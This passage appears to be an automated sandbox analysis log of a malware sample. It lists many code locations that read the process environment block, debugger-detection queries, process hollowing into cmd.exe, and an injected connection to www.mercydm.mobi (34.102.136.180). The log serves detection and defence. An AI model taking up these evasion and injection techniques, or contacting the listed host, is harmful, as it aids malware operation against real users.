        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010E7E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010E7E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010E7E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010E7E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010E7E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_0119AE44 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_0119AE44 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010E766D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_0111927A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_0118B260 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_0118B260 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_011A8A62 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010FAE73 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010FAE73 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010FAE73 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010FAE73 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010FAE73 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_0110D294 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_0110D294 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_0116FE87 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_0110FAB0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010D52A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010D52A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010D52A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010D52A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010D52A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_011546A7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010EAAB0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010EAAB0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_011A0EA5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_011A0EA5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_011A0EA5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_011A8ED6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01118EC7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_0118FEC0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01102ACB mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_011036CC mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010E76E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_011016E0 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01102AE4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001DB5E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D18ED6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C736CC mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C72ACB mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CFFEC0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C88EC7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C72AE4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C716E0 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C576E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CDFE87 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C7D294 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C7D294 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C452A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C452A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C452A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C452A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C452A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CC46A7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D10EA5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D10EA5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D10EA5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C5AAB0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C5AAB0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C7FAB0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C49240 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C49240 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C49240 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C49240 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C57E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C57E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C57E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C57E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C57E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C57E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D0EA55 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D0AE44 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D0AE44 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CD4257 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C5766D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CFB260 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CFB260 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C8927A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D18A62 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C6AE73 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C6AE73 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C6AE73 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C6AE73 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C6AE73 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C4C600 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C4C600 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C4C600 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C78E00 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C58A0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C4AA16 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C4AA16 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C45210 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C45210 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C45210 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C45210 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D01608 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C63A1C mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C7A61C mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C7A61C mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C4E620 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C84A2C mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C84A2C mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CFFE3F mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CC53CA mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CC53CA mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C703E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C703E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C703E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C703E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C703E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C703E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C6DBE9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C837F5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C51B8F mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C51B8F mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CFD380 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C72397 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C58794 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C7B390 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CC7794 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CC7794 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CC7794 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D0138A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C74BAD mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C74BAD mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C74BAD mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D15BA5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C4DB40 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C5EF40 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D18B58 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C4F358 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C4DB60 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C5FF60 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D18F6A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C73B7A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C73B7A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C7A70E mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C7A70E mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D0131B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C6F716 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D1070D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D1070D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CDFF10 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CDFF10 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C44F2E mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C44F2E mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C7E730 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D18CD6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CDB8D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CDB8D0 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CDB8D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CDB8D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CDB8D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CDB8D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C458EC mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D014FB mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CC6CF0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CC6CF0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CC6CF0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C49080 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CC3884 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CC3884 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C5849B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C890AF mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C720A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C720A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C720A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C720A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C720A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C720A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C7F0BF mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C7F0BF mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C7F0BF mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C7A44B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C60050 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C60050 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CDC450 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CDC450 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D02073 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D11074 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C6746D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D14015 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D14015 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CC6C0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CC6C0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CC6C0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CC6C0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D01C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D01C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D01C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D01C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D01C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D01C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D01C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D01C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D01C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D01C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D01C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D01C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D01C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D01C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CC7016 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CC7016 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CC7016 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D1740D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D1740D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D1740D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C7002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C7002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C7002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C7002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C7002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C7BC2C mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C5B02A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C5B02A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C5B02A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C5B02A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CC6DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CC6DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CC6DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CC6DC9 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CC6DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CC6DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C4B1E1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C4B1E1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C4B1E1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess queried: DebugPort
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess queried: DebugPort
        Source: C:\Windows\SysWOW64\cmd.exeProcess queried: DebugPort
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01119910 NtAdjustPrivilegesToken,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeMemory allocated: page read and write | page guard
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001C7310 SetUnhandledExceptionFilter,
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001C6FE3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

        HIPS / PFW / Operating System Protection Evasion

        barindex
        System process connects to network (likely due to code injection or exploit)
        Source: C:\Windows\explorer.exeDomain query: www.mercydm.mobi
        Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
        Sample uses process hollowing technique
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection unmapped: C:\Windows\SysWOW64\cmd.exe base address: 1B0000
